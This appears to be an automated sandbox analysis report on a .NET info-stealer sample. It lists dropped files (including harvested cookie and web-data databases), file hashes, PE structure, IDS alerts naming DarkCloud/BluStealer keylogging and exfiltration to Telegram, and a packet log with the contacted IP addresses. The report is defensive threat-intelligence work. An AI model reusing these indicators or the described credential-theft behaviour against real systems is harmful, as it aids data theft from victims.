                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\cookies.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\cookies.db-shm

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.017262956703125623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                      Malicious:false
                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\XgbXowhljC.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):982528
                                                                                      Entropy (8bit):7.795157964876488
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:kuC6ldTmp/Qa+jm1fPoiyKNHkqkb4MOBFTpL6:46TKQxjiHByeHSO7F
                                                                                      MD5:4112AC3213933BFC8412B5312D17377F
                                                                                      SHA1:A5DB44AE45EDADD94DBC4B3E6F2875FA643C43F1
                                                                                      SHA-256:B57DFD0E1E8888EC1F8E23E8D8F32409B06367247CEF043394A19C7E4F0787FB
                                                                                      SHA-512:A72A3B151833DA1E61FD6569431E6F48395D66781B319E04AE5FED410C62D00B6719178E52552C91AEEA8A13B200BB5F7B42A9EB08305205AA7BA065E0BB629D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 66%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d{Eg..............0.................. ... ....@.. .......................`............@.................................A...O.... ..,....................@..........T............................................ ............... ..H............text........ ...................... ..`.rsrc...,.... ......................@..@.reloc.......@......................@..B................u.......H........u..([......4...................................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......(......{....o.....{....o......{....o.....{....o......{....o.....{....o......{.....o......{......s....o .....{....r...po!.....{.....o".....{.... .... ....s#...o$.....{.....o%.....{....o.....

                                                                                      C:\Users\user\AppData\Roaming\XgbXowhljC.exe:Zone.Identifier

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.795157964876488
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      File name:oS6KsQIqJxe038Y.exe
                                                                                      File size:982'528 bytes
                                                                                      MD5:4112ac3213933bfc8412b5312d17377f
                                                                                      SHA1:a5db44ae45edadd94dbc4b3e6f2875fa643c43f1
                                                                                      SHA256:b57dfd0e1e8888ec1f8e23e8d8f32409b06367247cef043394a19c7e4f0787fb
                                                                                      SHA512:a72a3b151833da1e61fd6569431e6f48395d66781b319e04ae5fed410c62d00b6719178e52552c91aeea8a13b200bb5f7b42a9eb08305205aa7ba065e0bb629d
                                                                                      SSDEEP:24576:kuC6ldTmp/Qa+jm1fPoiyKNHkqkb4MOBFTpL6:46TKQxjiHByeHSO7F
                                                                                      TLSH:162512843357DA02E5E60BB008B1E3B8277D3E5DA414D31B5EEDACFB383631AA555293
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d{Eg..............0.................. ... ....@.. .......................`............@................................

                                                                                      File Icon

                                                                                      Icon Hash:00928e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x4f1096
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67457B64 [Tue Nov 26 07:40:20 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xf10410x4f.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf20000x62c.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xef08c0x54.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000xef09c0xef20042499dff13c2076eba59b7918abb937fFalse0.9117887888787245data7.80203646179826IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0xf20000x62c0x800606bd61d169ec7a5c14c4082dc9288fbFalse0.33837890625data3.458923341842514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0xf40000xc0x200f78db6662ba9cef7c96f6889546d7dd6False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_VERSION0xf20900x39cdata0.4199134199134199
                                                                                      RT_MANIFEST0xf243c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-11-27T20:46:31.765029+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549740162.55.60.280TCP
                                                                                      2024-11-27T20:46:36.371895+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549749162.55.60.280TCP
                                                                                      2024-11-27T20:46:39.631508+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549758149.154.167.220443TCP
                                                                                      2024-11-27T20:46:40.531766+01002044741ET MALWARE DarkCloud Stealer File Grabber Function Exfiltrating Data via Telegram1192.168.2.549758149.154.167.220443TCP
                                                                                      2024-11-27T20:46:53.237901+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549786149.154.167.220443TCP
                                                                                      2024-11-27T20:46:54.700939+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549788149.154.167.220443TCP
                                                                                      2024-11-27T20:47:02.820040+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549794149.154.167.220443TCP
                                                                                      2024-11-27T20:47:05.735029+01002045300ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram1192.168.2.549794149.154.167.220443TCP
                                                                                      2024-11-27T20:47:06.716060+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549795149.154.167.220443TCP
                                                                                      2024-11-27T20:47:07.500213+01002045300ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram1192.168.2.549795149.154.167.220443TCP
                                                                                      2024-11-27T20:47:17.860928+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549798149.154.167.220443TCP
                                                                                      2024-11-27T20:47:18.897667+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549799149.154.167.220443TCP
                                                                                      2024-11-27T20:47:48.470477+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549802149.154.167.220443TCP
                                                                                      2024-11-27T20:47:50.548160+01002045300ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram1192.168.2.549802149.154.167.220443TCP
                                                                                      2024-11-27T20:47:52.182326+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549803149.154.167.220443TCP
                                                                                      2024-11-27T20:47:52.799467+01002045300ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram1192.168.2.549803149.154.167.220443TCP
                                                                                      2024-11-27T20:47:57.603930+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549805149.154.167.220443TCP
                                                                                      2024-11-27T20:48:00.603319+01002852388ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M41192.168.2.549806149.154.167.220443TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 27, 2024 20:46:30.354454041 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:30.479254961 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:30.479389906 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:30.479710102 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:30.599580050 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.764827967 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.764981031 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.764995098 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.765028954 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.765080929 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.765110970 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.765124083 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.765135050 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.765146971 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.765150070 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.765160084 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.765186071 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.765218973 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.765516043 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.765532970 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.765568972 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.765583038 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.885132074 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.885159969 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.885212898 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.885346889 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.889303923 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.890747070 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.956670046 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.956752062 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.956882954 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.956955910 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.960944891 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.961009026 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.961055994 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.967447996 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.967565060 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.967582941 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.967622042 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.975806952 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.975878954 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.975904942 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.975919008 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:31.984282970 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.984294891 CET8049740162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:31.984368086 CET4974080192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:34.770804882 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:34.994404078 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:34.994512081 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:34.994776964 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:35.117234945 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.371814013 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.371869087 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.371882915 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.371895075 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.371926069 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.372092009 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.372106075 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.372121096 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.372142076 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.372174025 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.372200012 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.372549057 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.372564077 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.372581959 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.372613907 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.372648001 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.491868019 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.491925955 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.491995096 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.582176924 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.582245111 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.582302094 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.582343102 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.586374044 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.586426020 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.586463928 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.586503029 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.593394041 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.593457937 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.593543053 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.593633890 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.601388931 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.601433992 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.601471901 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.601520061 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.609852076 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.609913111 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:36.609975100 CET8049749162.55.60.2192.168.2.5
                                                                                      Nov 27, 2024 20:46:36.610037088 CET4974980192.168.2.5162.55.60.2
                                                                                      Nov 27, 2024 20:46:38.073568106 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:38.073611975 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:38.073688984 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:38.076497078 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:38.076512098 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:39.536293983 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:39.536416054 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:39.623559952 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:39.623579979 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:39.623971939 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:39.624053955 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:39.630970955 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:39.631331921 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:39.631362915 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:39.631418943 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:39.631424904 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:39.631488085 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:39.631504059 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:40.531898975 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:40.531985044 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:40.531996012 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:40.532006025 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:40.532058954 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:40.532773972 CET49758443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:40.532789946 CET44349758149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:51.789659023 CET49786443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:51.789721012 CET44349786149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:51.789869070 CET49786443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:51.790196896 CET49786443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:51.790214062 CET44349786149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:53.233643055 CET49788443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:53.233685970 CET44349788149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:53.233846903 CET49788443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:53.235683918 CET44349786149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:53.236593962 CET49788443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:46:53.236607075 CET44349788149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:46:53.236623049 CET49786443192.168.2.5149.154.167.220
